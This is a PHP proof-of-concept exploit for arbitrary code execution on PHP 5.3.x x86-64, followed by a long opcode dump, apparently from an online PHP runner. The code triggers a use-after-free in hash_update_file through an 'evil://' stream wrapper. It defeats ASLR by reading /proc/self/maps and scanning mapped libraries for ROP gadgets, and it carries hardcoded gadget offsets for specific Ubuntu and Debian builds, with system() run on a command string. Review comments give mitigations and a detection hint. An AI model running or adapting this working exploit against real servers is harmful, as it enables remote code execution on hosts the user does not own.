<?php
/*
 * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com>
 *
 * PHP 5.3.x Linux x86-64 arbitrary code execution
 *
 * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012)
 *
 * NOTES:
 * Most distro's ship with PIE compiled httpd's these days, and everyone
 * seems to favour php5 as module rather than using php-cgi. This puts us
 * in an annoying position for doing Return-oriented-whatever.
 *
 * So the bad news is this exploit only works without restrictions against
 * machines that use php5-cgi and where gadgets have already been identified.
 *
 * However, the good news is if PHP doesn't enforce open_basedir restrictions
 * there's still a fat chance this exploit will succeed by parsing /proc/self/maps
 * to circumvent ASLR and identify gadgets during runtime by scanning libraries.
 *
 */

/*
 * NOTE(review): historical proof-of-concept. It depends on a PHP 5.3-era bug
 * (MOPS-2010-001, named above) plus per-build gadget offsets, so it is only
 * meaningful against the PHP 5.3 builds keyed in $cgirop, or a host where the
 * /proc/self/maps fallback can read the interpreter's own mapped libraries.
 * The header's own mitigation list applies: open_basedir blocks the fallback's
 * file_get_contents() calls, and PIE/module builds defeat the fixed offsets.
 * From a monitoring angle, a web-facing PHP process reading /proc/self/maps and
 * then its own mapped ELF files is unusual enough to be worth alerting on.
 */

error_reporting(E_ALL);

// Command string appended to whatever evil_stream::stream_read() returns.
$CMD = "php-4.3.0 --version";

/**
 * Unpack consecutive fixed-width integer fields from a binary string.
 *
 * @param array  $fmt  name => 'u16' | 'u32' | 'u64', in field order
 * @param string $data raw bytes; fields are read back to back from offset 0
 * @return array name => int
 *
 * 'u16' uses unpack's 'S' (machine byte order); 'u32' and 'u64' use 'V'
 * (little-endian). A u64 is rebuilt from two 32-bit halves, which requires
 * 64-bit PHP integers (the header targets x86-64). There is no length check
 * on $data: a short buffer makes unpack() warn and return false, so the
 * affected field ends up null.
 */
function ustruct($fmt, $data)
{
    $out = array();
    $pos = 0;
    $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2');
    $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 );

    foreach($fmt as $name => $type) {
        $v = unpack($upack[$type], substr($data, $pos, $sizes[$type]));
        if ($type == 'u64')
            $v = ($v[2] << 32) | $v[1]; // low dword first, high dword second
        else
            $v = $v[1];
        $out[$name] = $v;
        $pos += $sizes[$type];
    }

    return $out;
}

/**
 * Parse an ELF64 file and return its executable sections.
 *
 * Reads the 0x40-byte ELF header, then $hdr['shnum'] section headers of
 * $hdr['shentsize'] bytes each, starting at $hdr['shoff']. Only sections
 * whose flags have bit 0x4 set (SHF_EXECINSTR) are returned; each gets two
 * extra keys: 'str' (the NUL-terminated name looked up in the string-table
 * section at index shstrndx) and 'data' (the section's raw bytes).
 *
 * @param string $filename path of the ELF file; read whole via file_get_contents()
 * @return array list of section-header arrays as produced by ustruct()
 *
 * Prints "[>>] $filename" as a progress marker. No sanity checks on magic,
 * class or offsets: a non-ELF or truncated file produces warnings, not an error.
 */
function get_sections($filename)
{
    // Elf64_Ehdr; e_ident (16 bytes) is read as two u64s.
    $elf64_header = array(
        'e_ident0' => 'u64', 'e_ident1' => 'u64',
        'type' => 'u16', 'machine' => 'u16', 'version' => 'u32',
        'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64',
        'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16',
        'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16',
        'shstrndx' => 'u16'
    );

    // Elf64_Shdr
    $elf64_sh = array(
        'name' => 'u32', 'type' => 'u32', 'flags' => 'u64',
        'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64',
        'link' => 'u32', 'info' => 'u32', 'align' => 'u64',
        'entsize'=> 'u64'
    );

    $buf = file_get_contents($filename);
    $hdr = ustruct($elf64_header, substr($buf, 0, 0x40));
    echo "[>>] $filename\n";

    $sections = array();
    for($i = 0; $i < $hdr['shnum']; $i++) {
        $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']);
        $sections[] = ustruct($elf64_sh, $data);
    }

    // Section-name string table.
    $str_section = $sections[ $hdr['shstrndx'] ];

    $ret_sections = array();
    for($i = 0; $i < count($sections); $i++) {
        if (!($sections[$i]['flags']&4)) // SHF_EXECINSTR
            continue;
        $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) );
        $sections[$i]['str'] = $v[0];
        $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']);
        $ret_sections[] = $sections[$i];
    }

    return $ret_sections;
}

/**
 * Locate byte patterns in a blob.
 *
 * @param array  $gg   name => pattern string, or name => list of alternative patterns
 * @param string $data haystack
 * @param int    $base added to every match offset (callers pass the section's file offset)
 * @return array name => $base + offset of the FIRST occurrence of the pattern.
 *               Names with no match are absent. When several alternatives
 *               match, the last matching alternative wins, because each
 *               match overwrites $ret[$name].
 */
function find_gadgets($gg, $data, $base=0)
{
    $ret = array();
    foreach($gg as $name => $patterns) {
        if (!is_array($patterns))
            $patterns = array($patterns);
        foreach($patterns as $pattern) {
            if (($pos = strpos($data, $pattern)) !== false) {
                $ret[$name] = $base+$pos;
            }
        }
    }
    return $ret;
}

/**
 * Pack an integer as 8 little-endian bytes (low dword, then high dword).
 * Relies on 64-bit PHP integers; ">> 32" is an arithmetic shift, so the
 * high dword of a negative value carries sign bits.
 */
function w64($v)
{
    return pack("V", $v & 0xffffffff) . pack("V", $v >> 32);
}

// Assigned in both branches below but never read anywhere in this script.
$resolve = true;

// php-cgi heuristic (see header): look for "cgi" in ORIG_SCRIPT_NAME or
// ORIG_SCRIPT_FILENAME. With a known build the offsets come from the table;
// on an unknown version fall through to the /proc/self/maps scan below.
if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) ||
      (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) {
    $resolve = false;
    // phpversion() => eight offsets, positionally matching the eight-name
    // $ropvar list in the "else" branch further down.
    $cgirop = array(
        "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20),
        "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260),
        "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970),
        //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476,
    );

    $v = phpversion();
    if (!isset($cgirop[$v])) {
        echo "plz2portgadgets: ".$v."\nattempting fallback!\n";
        $resolve = true;
    } else
        $addy = $cgirop[$v];
}

// Runtime fallback: search the executable sections of every executable
// mapping listed in /proc/self/maps for the byte patterns. This is the path
// the header says open_basedir blocks -- the maps file and each mapped
// library are read with file_get_contents().
if (!isset($addy)) {
    $patterns = array(
        'ADDRSP' => "\x48\x83\xc4\x28\xc3",
        'POPRAX' => "\x58\xc3",
        'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", "\x48\x8d\x7c\x24\x18\xff\xe0" ),
        'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16"
    );

    $maps = explode("\n", file_get_contents("/proc/self/maps") );
    $gadgets = array();
    foreach($maps as $map) {
        // /proc/self/maps fields: range perms offset dev inode path
        $map = explode(" ", preg_replace('!\s+!', ' ', $map));
        if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[')
            continue;
        // once a single pattern is left, only libc mappings are scanned
        if (count($patterns) == 1 && !strstr($map[5], "libc"))
            continue;

        $exec_sections = get_sections($map[5]);
        $tmp = explode("-", $map[0]);
        $page_offs = hexdec($tmp[0]); // start address of the mapping

        foreach($exec_sections as $section) {
            $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] );
            foreach($new_gadgets as $name => $offs) {
                if (isset($patterns[$name])) {
                    printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs);
                    unset($patterns[$name]);
                    $new_gadgets[$name] += $page_offs;
                }
            }
            if (count($new_gadgets) > 0)
                $gadgets = array_merge($gadgets, $new_gadgets);
            if (count($patterns) == 0) {
                echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n";
                break 2;
            }
        }
    }
    $addy = $gadgets;
}

// Bind each address to a global named after it (w64-packed) so that
// evil_stream::stream_read() can import them with "global".
// PHP 5 parses "$$ropvar[$i]" as ${$ropvar[$i]}; PHP 7's uniform variable
// syntax parses it as ${$ropvar}[$i]. The opcode dump on this page (FETCH_W
// on !16 followed by ASSIGN_DIM) shows the PHP 7 reading, so on 7.x the
// assignment goes to a single variable named by (string)$ropvar instead of
// to $ADDRSP, $POPRAX, etc.
if (isset($gadgets)) {
    $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM');
    for($i = 0; $i < count($ropvar); $i++) {
        printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]);
        $$ropvar[$i] = w64($addy[ $ropvar[$i] ]);
    }
} else {
    $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA');
    for($i = 0; $i < count($ropvar); $i++) {
        printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]);
        $$ropvar[$i] = w64($addy[ $i ]);
    }
}

// A partial gadget scan or a table of the wrong length bails out here.
if (!isset($addy) || count($addy) != count($ropvar))
    die("looks like this tech isn't compatible with your box.\n");

/**
 * Stream wrapper registered as "evil://". Only stream_read() does real work;
 * it is invoked from inside the hash_update_file() call at the bottom.
 */
class evil_stream {
    function stream_open($a, $b, $c, &$e) { return 1; } // accept any URL
    function stream_eof() { return 0; }                  // never reports EOF
    function stream_seek($offset, $whence) { return 0; }

    function stream_read($count) {
        global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM;

        // Finalizes the very hash context that hash_update_file() is still
        // feeding from this stream -- the MOPS-2010-001 condition the header
        // refers to.
        hash_final($GLOBALS['hid'], false);
        $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp

        // Two payload shapes: the four runtime-resolved gadgets when SYSTEM
        // was located by the /proc/self/maps scan, otherwise the eight-entry
        // precomputed table. Both end with $CMD, NUL-terminated.
        if (isset($SYSTEM) && !empty($SYSTEM))
            return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00";
        else
            return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00";
    }
}

stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n");

$hid = hash_init('md5');
// Reading "evil://code" routes hash_update_file() through evil_stream::stream_read().
hash_update_file($hid, "evil://code");
// Reached only if hash_update_file() returns normally.
echo "you goofed up\n";
?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 8, Position 2 = 16
Branch analysis from position: 8
2 jumps found. (Code = 47) Position 1 = 17, Position 2 = 29
Branch analysis from position: 17
2 jumps found. (Code = 46) Position 1 = 20, Position 2 = 28
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 30, Position 2 = 45
Branch analysis from position: 30
2 jumps found. (Code = 43) Position 1 = 38, Position 2 = 43
Branch analysis from position: 38
1 jumps found. (Code = 42) Position 1 = 45
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 164
Branch analysis from position: 48
2 jumps found. (Code = 77) Position 1 = 59, Position 2 = 162
Branch analysis from position: 59
2 jumps found. (Code = 78) Position 1 = 60, Position 2 = 162
Branch analysis from position: 60
2 jumps found. (Code = 47) Position 1 = 73, Position 2 = 80
Branch analysis from position: 73
2 jumps found. (Code = 47) Position 1 = 81, Position 2 = 85
Branch analysis from position: 81
2 jumps found. (Code = 43) Position 1 = 86, Position 2 = 87
Branch analysis from position: 86
1 jumps found. (Code = 42) Position 1 = 59
Branch analysis from position: 59
Branch analysis from position: 87
2 jumps found. (Code = 46) Position 1 = 90, Position 2 = 97
Branch analysis from position: 90
2 jumps found. (Code = 43) Position 1 = 98, Position 2 = 99
Branch analysis from position: 98
1 jumps found. (Code = 42) Position 1 = 59
Branch analysis from position: 59
Branch analysis from position: 99
2 jumps found. (Code = 77) Position 1 = 116, Position 2 = 160
Branch analysis from position: 116
2 jumps found. (Code = 78) Position 1 = 117, Position 2 = 160
Branch analysis from position: 117
2 jumps found. (Code = 77) Position 1 = 126, Position 2 = 144
Branch analysis from position: 126
2 jumps found. (Code = 78) Position 1 = 127, Position 2 = 144
Branch analysis from position: 127
2 jumps found. (Code = 43) Position 1 = 130, Position 2 = 143
Branch analysis from position: 130
1 jumps found. (Code = 42) Position 1 = 126
Branch analysis from position: 126
Branch analysis from position: 143
Branch analysis from position: 144
2 jumps found. (Code = 43) Position 1 = 148, Position 2 = 153
Branch analysis from position: 148
2 jumps found. (Code = 43) Position 1 = 156, Position 2 = 159
Branch analysis from position: 156
1 jumps found. (Code = 42) Position 1 = 162
Branch analysis from position: 162
2 jumps found. (Code = 43) Position 1 = 166, Position 2 = 190
Branch analysis from position: 166
1 jumps found. (Code = 42) Position 1 = 186
Branch analysis from position: 186
2 jumps found. (Code = 44) Position 1 = 189, Position 2 = 169
Branch analysis from position: 189
1 jumps found. (Code = 42) Position 1 = 211
Branch analysis from position: 211
2 jumps found. (Code = 47) Position 1 = 214, Position 2 = 218
Branch analysis from position: 214
2 jumps found. (Code = 43) Position 1 = 219, Position 2 = 220
Branch analysis from position: 219
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 220
2 jumps found. (Code = 47) Position 1 = 225, Position 2 = 227
Branch analysis from position: 225
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 227
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 218
Branch analysis from position: 169
2 jumps found. (Code = 44) Position 1 = 189, Position 2 = 169
Branch analysis from position: 189
Branch analysis from position: 169
Branch analysis from position: 190
1 jumps found. (Code = 42) Position 1 = 208
Branch analysis from position: 208
2 jumps found. (Code = 44) Position 1 = 211, Position 2 = 193
Branch analysis from position: 211
Branch analysis from position: 193
2 jumps found. (Code = 44) Position 1 = 211, Position 2 = 193
Branch analysis from position: 211
Branch analysis from position: 193
Branch analysis from position: 159
1 jumps found. (Code = 42) Position 1 = 116
Branch analysis from position: 116
Branch analysis from position: 153
Branch analysis from position: 144
Branch analysis from position: 160
1 jumps found. (Code = 42) Position 1 = 59
Branch analysis from position: 59
Branch analysis from position: 160
Branch analysis from position: 97
Branch analysis from position: 85
Branch analysis from position: 80
Branch analysis from position: 162
Branch analysis from position: 162
Branch analysis from position: 164
Branch analysis from position: 43
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 164
Branch analysis from position: 48
Branch analysis from position: 164
Branch analysis from position: 45
Branch analysis from position: 28
Branch analysis from position: 29
Branch analysis from position: 16
filename:       /in/4voOh
function name:  (null)
number of ops:  237
compiled vars:  !0 = $CMD, !1 = $resolve, !2 = $cgirop, !3 = $v, !4 = $addy, !5 = $patterns, !6 = $maps, !7 = $gadgets, !8 = $map, !9 = $exec_sections, !10 = $tmp, !11 = $page_offs, !12 = $section, !13 = $new_gadgets, !14 = $offs, !15 = $name, !16 = $ropvar, !17 = $i, !18 = $hid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   22     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 32767
          2        DO_ICALL                                                 
   24     3        ASSIGN                                                   !0, 'php-4.3.0+--version'
  107     4        ASSIGN                                                   !1, <true>
  110     5        FETCH_IS                                         ~22     '_SERVER'
          6        ISSET_ISEMPTY_DIM_OBJ                         0  ~23     ~22, 'ORIG_SCRIPT_NAME'
          7      > JMPZ_EX                                          ~23     ~23, ->16
          8    >   INIT_FCALL                                               'strstr'
          9        FETCH_R                      global              ~24     '_SERVER'
         10        FETCH_DIM_R                                      ~25     ~24, 'ORIG_SCRIPT_NAME'
         11        SEND_VAL                                                 ~25
         12        SEND_VAL                                                 'cgi'
         13        DO_ICALL                                         $26     
         14        TYPE_CHECK                                  1018  ~27     $26
         15        BOOL                                             ~23     ~27
         16    > > JMPNZ_EX                                         ~23     ~23, ->29
  111    17    >   FETCH_IS                                         ~28     '_SERVER'
         18        ISSET_ISEMPTY_DIM_OBJ                         0  ~29     ~28, 'ORIG_SCRIPT_FILENAME'
         19      > JMPZ_EX                                          ~29     ~29, ->28
         20    >   INIT_FCALL                                               'strstr'
         21        FETCH_R                      global              ~30     '_SERVER'
         22        FETCH_DIM_R                                      ~31     ~30, 'ORIG_SCRIPT_FILENAME'
         23        SEND_VAL                                                 ~31
         24        SEND_VAL                                                 'cgi'
         25        DO_ICALL                                         $32     
         26        TYPE_CHECK                                  1018  ~33     $32
         27        BOOL                                             ~29     ~33
         28    >   BOOL                                             ~23     ~29
         29    > > JMPZ                                                     ~23, ->45
  113    30    >   ASSIGN                                                   !1, <false>
  115    31        ASSIGN                                                   !2, <array>
  122    32        INIT_FCALL                                               'phpversion'
         33        DO_ICALL                                         $36     
         34        ASSIGN                                                   !3, $36
  123    35        ISSET_ISEMPTY_DIM_OBJ                         0  ~38     !2, !3
         36        BOOL_NOT                                         ~39     ~38
         37      > JMPZ                                                     ~39, ->43
  124    38    >   CONCAT                                           ~40     'plz2portgadgets%3A+', !3
         39        CONCAT                                           ~41     ~40, '%0Aattempting+fallback%21%0A'
         40        ECHO                                                     ~41
  125    41        ASSIGN                                                   !1, <true>
         42      > JMP                                                      ->45
  127    43    >   FETCH_DIM_R                                      ~43     !2, !3
         44        ASSIGN                                                   !4, ~43
  130    45    >   ISSET_ISEMPTY_CV                                 ~45     !4
         46        BOOL_NOT                                         ~46     ~45
         47      > JMPZ                                                     ~46, ->164
  131    48    >   ASSIGN                                                   !5, <array>
  141    49        INIT_FCALL                                               'explode'
         50        SEND_VAL                                                 '%0A'
  142    51        INIT_FCALL                                               'file_get_contents'
         52        SEND_VAL                                                 '%2Fproc%2Fself%2Fmaps'
         53        DO_ICALL                                         $48     
         54        SEND_VAR                                                 $48
         55        DO_ICALL                                         $49     
  141    56        ASSIGN                                                   !6, $49
  144    57        ASSIGN                                                   !7, <array>
  145    58      > FE_RESET_R                                       $52     !6, ->162
         59    > > FE_FETCH_R                                               $52, !8, ->162
  146    60    >   INIT_FCALL                                               'explode'
         61        SEND_VAL                                                 '+'
         62        INIT_FCALL                                               'preg_replace'
         63        SEND_VAL                                                 '%21%5Cs%2B%21'
         64        SEND_VAL                                                 '+'
         65        SEND_VAR                                                 !8
         66        DO_ICALL                                         $53     
         67        SEND_VAR                                                 $53
         68        DO_ICALL                                         $54     
         69        ASSIGN                                                   !8, $54
  147    70        COUNT                                            ~56     !8
         71        IS_SMALLER                                       ~57     ~56, 2
         72      > JMPNZ_EX                                         ~57     ~57, ->80
         73    >   INIT_FCALL                                               'strstr'
         74        FETCH_DIM_R                                      ~58     !8, 1
         75        SEND_VAL                                                 ~58
         76        SEND_VAL                                                 'x'
         77        DO_ICALL                                         $59     
         78        BOOL_NOT                                         ~60     $59
         79        BOOL                                             ~57     ~60
         80    > > JMPNZ_EX                                         ~57     ~57, ->85
         81    >   FETCH_DIM_R                                      ~61     !8, 5
         82        FETCH_DIM_R                                      ~62     ~61, 0
         83        IS_EQUAL                                         ~63     ~62, '%5B'
         84        BOOL                                             ~57     ~63
         85    > > JMPZ                                                     ~57, ->87
  148    86    > > JMP                                                      ->59
  149    87    >   COUNT                                            ~64     !5
         88        IS_EQUAL                                         ~65     ~64, 1
         89      > JMPZ_EX                                          ~65     ~65, ->97
         90    >   INIT_FCALL                                               'strstr'
         91        FETCH_DIM_R                                      ~66     !8, 5
         92        SEND_VAL                                                 ~66
         93        SEND_VAL                                                 'libc'
         94        DO_ICALL                                         $67     
         95        BOOL_NOT                                         ~68     $67
         96        BOOL                                             ~65     ~68
         97    > > JMPZ                                                     ~65, ->99
  150    98    > > JMP                                                      ->59
  151    99    >   INIT_FCALL                                               'get_sections'
        100        FETCH_DIM_R                                      ~69     !8, 5
        101        SEND_VAL                                                 ~69
        102        DO_FCALL                                      0  $70     
        103        ASSIGN                                                   !9, $70
  153   104        INIT_FCALL                                               'explode'
        105        SEND_VAL                                                 '-'
        106        FETCH_DIM_R                                      ~72     !8, 0
        107        SEND_VAL                                                 ~72
        108        DO_ICALL                                         $73     
        109        ASSIGN                                                   !10, $73
  154   110        INIT_FCALL                                               'hexdec'
        111        FETCH_DIM_R                                      ~75     !10, 0
        112        SEND_VAL                                                 ~75
        113        DO_ICALL                                         $76     
        114        ASSIGN                                                   !11, $76
  156   115      > FE_RESET_R                                       $78     !9, ->160
        116    > > FE_FETCH_R                                               $78, !12, ->160
  157   117    >   INIT_FCALL                                               'find_gadgets'
  158   118        SEND_VAR                                                 !5
        119        FETCH_DIM_R                                      ~79     !12, 'data'
        120        SEND_VAL                                                 ~79
        121        FETCH_DIM_R                                      ~80     !12, 'offset'
        122        SEND_VAL                                                 ~80
        123        DO_FCALL                                      0  $81     
  157   124        ASSIGN                                                   !13, $81
  160   125      > FE_RESET_R                                       $83     !13, ->144
        126    > > FE_FETCH_R                                       ~84     $83, !14, ->144
        127    >   ASSIGN                                                   !15, ~84
  161   128        ISSET_ISEMPTY_DIM_OBJ                         0          !5, !15
        129      > JMPZ                                                     ~86, ->143
  162   130    >   INIT_FCALL                                               'printf'
        131        SEND_VAL                                                 '++%60-+found+gadget+%27%25s%27+in+%5B%25s+-%3E+%25s%5D+%40+0x%25x%0A'
        132        SEND_VAR                                                 !15
        133        FETCH_DIM_R                                      ~87     !8, 5
        134        SEND_VAL                                                 ~87
        135        FETCH_DIM_R                                      ~88     !12, 'str'
        136        SEND_VAL                                                 ~88
        137        ADD                                              ~89     !11, !14
        138        SEND_VAL                                                 ~89
        139        DO_ICALL                                                 
  163   140        UNSET_DIM                                                !5, !15
  164   141        ASSIGN_DIM_OP                +=               1          !13, !15
        142        OP_DATA                                                  !11
  160   143    > > JMP                                                      ->126
        144    >   FE_FREE                                                  $83
  167   145        COUNT                                            ~92     !13
        146        IS_SMALLER                                               0, ~92
        147      > JMPZ                                                     ~93, ->153
  168   148    >   INIT_FCALL                                               'array_merge'
        149        SEND_VAR                                                 !7
        150        SEND_VAR                                                 !13
        151        DO_ICALL                                         $94     
        152        ASSIGN                                                   !7, $94
  169   153    >   COUNT                                            ~96     !5
        154        IS_EQUAL                                                 ~96, 0
        155      > JMPZ                                                     ~97, ->159
  170   156    >   ECHO                                                     '%21%21%21+ALL+GADGETS+FOUND%2C+LETS-A-GO+%21%21%21%0A'
  171   157        FE_FREE                                                  $78
        158      > JMP                                                      ->162
  156   159    > > JMP                                                      ->116
        160    >   FE_FREE                                                  $78
  145   161      > JMP                                                      ->59
        162    >   FE_FREE                                                  $52
  175   163        ASSIGN                                                   !4, !7
  177   164    >   ISSET_ISEMPTY_CV                                         !7
        165      > JMPZ                                                     ~99, ->190
  178   166    >   ASSIGN                                                   !16, <array>
  179   167        ASSIGN                                                   !17, 0
        168      > JMP                                                      ->186
  180   169    >   INIT_FCALL                                               'printf'
        170        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        171        FETCH_DIM_R                                      ~102    !16, !17
        172        SEND_VAL                                                 ~102
        173        FETCH_DIM_R                                      ~103    !16, !17
        174        FETCH_DIM_R                                      ~104    !4, ~103
        175        SEND_VAL                                                 ~104
        176        DO_ICALL                                                 
  181   177        INIT_FCALL                                               'w64'
        178        FETCH_DIM_R                                      ~108    !16, !17
        179        FETCH_DIM_R                                      ~109    !4, ~108
        180        SEND_VAL                                                 ~109
        181        DO_FCALL                                      0  $110    
        182        FETCH_W                      local               $106    !16
        183        ASSIGN_DIM                                               $106, !17
        184        OP_DATA                                                  $110
  179   185        PRE_INC                                                  !17
        186    >   COUNT                                            ~112    !16
        187        IS_SMALLER                                               !17, ~112
        188      > JMPNZ                                                    ~113, ->169
        189    > > JMP                                                      ->211
  184   190    >   ASSIGN                                                   !16, <array>
  186   191        ASSIGN                                                   !17, 0
        192      > JMP                                                      ->208
  187   193    >   INIT_FCALL                                               'printf'
        194        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        195        FETCH_DIM_R                                      ~116    !16, !17
        196        SEND_VAL                                                 ~116
        197        FETCH_DIM_R                                      ~117    !4, !17
        198        SEND_VAL                                                 ~117
        199        DO_ICALL                                                 
  188   200        INIT_FCALL                                               'w64'
        201        FETCH_DIM_R                                      ~121    !4, !17
        202        SEND_VAL                                                 ~121
        203        DO_FCALL                                      0  $122    
        204        FETCH_W                      local               $119    !16
        205        ASSIGN_DIM                                               $119, !17
        206        OP_DATA                                                  $122
  186   207        PRE_INC                                                  !17
        208    >   COUNT                                            ~124    !16
        209        IS_SMALLER                                               !17, ~124
        210      > JMPNZ                                                    ~125, ->193
  192   211    >   ISSET_ISEMPTY_CV                                 ~126    !4
        212        BOOL_NOT                                         ~127    ~126
        213      > JMPNZ_EX                                         ~127    ~127, ->218
        214    >   COUNT                                            ~128    !4
        215        COUNT                                            ~129    !16
        216        IS_NOT_EQUAL                                     ~130    ~128, ~129
        217        BOOL                                             ~127    ~130
        218    > > JMPZ                                                     ~127, ->220
  193   219    > > EXIT                                                     'looks+like+this+tech+isn%27t+compatible+with+your+box.%0A'
  222   220    >   INIT_FCALL                                               'stream_wrapper_register'
        221        SEND_VAL                                                 'evil'
        222        SEND_VAL                                                 'evil_stream'
        223        DO_ICALL                                         $131    
        224      > JMPNZ_EX                                         ~132    $131, ->227
        225    > > EXIT                                                     'oh+snap+%3A%28%0A'
        226*       BOOL                                             ~132    <true>
  223   227    >   INIT_FCALL                                               'hash_init'
        228        SEND_VAL                                                 'md5'
        229        DO_ICALL                                         $133    
        230        ASSIGN                                                   !18, $133
  224   231        INIT_FCALL                                               'hash_update_file'
        232        SEND_VAR                                                 !18
        233        SEND_VAL                                                 'evil%3A%2F%2Fcode'
        234        DO_ICALL                                                 
  225   235        ECHO                                                     'you+goofed+up%0A'
  226   236      > RETURN                                                   1

Function ustruct:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 7, Position 2 = 36
Branch analysis from position: 7
2 jumps found. (Code = 78) Position 1 = 8, Position 2 = 36
Branch analysis from position: 8
2 jumps found. (Code = 43) Position 1 = 23, Position 2 = 29
Branch analysis from position: 23
1 jumps found. (Code = 42) Position 1 = 31
Branch analysis from position: 31
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 29
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 36
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 36
filename:       /in/4voOh
function name:  ustruct
number of ops:  39
compiled vars:  !0 = $fmt, !1 = $data, !2 = $out, !3 = $pos, !4 = $upack, !5 = $sizes, !6 = $type, !7 = $name, !8 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   26     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   27     2        ASSIGN                                                   !2, <array>
   28     3        ASSIGN                                                   !3, 0
   29     4        ASSIGN                                                   !4, <array>
   30     5        ASSIGN                                                   !5, <array>
   32     6      > FE_RESET_R                                       $13     !0, ->36
          7    > > FE_FETCH_R                                       ~14     $13, !6, ->36
          8    >   ASSIGN                                                   !7, ~14
   33     9        INIT_FCALL                                               'unpack'
         10        FETCH_DIM_R                                      ~16     !4, !6
         11        SEND_VAL                                                 ~16
         12        INIT_FCALL                                               'substr'
         13        SEND_VAR                                                 !1
         14        SEND_VAR                                                 !3
         15        FETCH_DIM_R                                      ~17     !5, !6
         16        SEND_VAL                                                 ~17
         17        DO_ICALL                                         $18     
         18        SEND_VAR                                                 $18
         19        DO_ICALL                                         $19     
         20        ASSIGN                                                   !8, $19
   34    21        IS_EQUAL                                                 !6, 'u64'
         22      > JMPZ                                                     ~21, ->29
   35    23    >   FETCH_DIM_R                                      ~22     !8, 2
         24        SL                                               ~23     ~22, 32
         25        FETCH_DIM_R                                      ~24     !8, 1
         26        BW_OR                                            ~25     ~23, ~24
         27        ASSIGN                                                   !8, ~25
         28      > JMP                                                      ->31
   37    29    >   FETCH_DIM_R                                      ~27     !8, 1
         30        ASSIGN                                                   !8, ~27
   38    31    >   ASSIGN_DIM                                               !2, !7
         32        OP_DATA                                                  !8
   39    33        FETCH_DIM_R                                      ~30     !5, !6
         34        ASSIGN_OP                                     1          !3, ~30
   32    35      > JMP                                                      ->7
         36    >   FE_FREE                                                  $13
   41    37      > RETURN                                                   !2
   42    38*     > RETURN                                                   null

End of function ustruct

Function get_sections:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 42
Branch analysis from position: 42
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 24
Branch analysis from position: 45
1 jumps found. (Code = 42) Position 1 = 90
Branch analysis from position: 90
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 51
2 jumps found. (Code = 43) Position 1 = 56, Position 2 = 57
Branch analysis from position: 56
1 jumps found. (Code = 42) Position 1 = 89
Branch analysis from position: 89
